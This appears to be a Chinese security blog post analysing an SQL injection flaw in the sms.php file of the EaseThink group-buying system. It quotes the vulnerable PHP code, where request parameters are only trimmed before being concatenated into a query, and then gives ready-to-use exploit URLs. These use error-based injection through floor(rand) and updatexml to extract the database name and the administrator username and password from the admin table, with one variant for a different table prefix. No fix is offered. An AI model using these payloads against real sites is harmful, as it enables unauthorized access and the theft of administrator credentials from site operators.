易想团购sms.php SQL注入漏洞分析及利用 Secer's Blog - 记录互联网安全历程与个人成长经历

首发：http://club.freebuf.com/?/question/416

by 0x53sec http://www.freebuf.com/author/0x53sec

易想团购系统sms.php文件里面的几个变量过滤不严格导致了SQL注入漏洞。部分代码：

elseif($_REQUEST['act']=='do_unsubscribe_verify')
{
    $code = trim($_REQUEST['code']);
    $mobile = trim($_REQUEST['mobile']);
    $mobile_item = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile = '".$mobile."' and verify_code = '".$code."'");  //这里的$mobile和$code变量都只过滤了空格，导致了SQL注入的产生。
    if($mobile_item)
    {
        $GLOBALS['db']->query("delete from ".DB_PREFIX."mobile_list where id = ".$mobile_item['id']);
        $result['type'] = 1;
        ajax_return($result);
    }
    else
    {
        $result['type'] = 0;
        $result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
        ajax_return($result);
    }
}
?>

Exp:

/sms.php?act=do_unsubscribe_verify&code='%20and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

获取管理帐号密码：

/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))%23

改表前缀

/sms.php?act=do_unsubscribe_verify&code='and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))%23

易想团购sms.php SQL注入漏洞分析及利用

Hacking more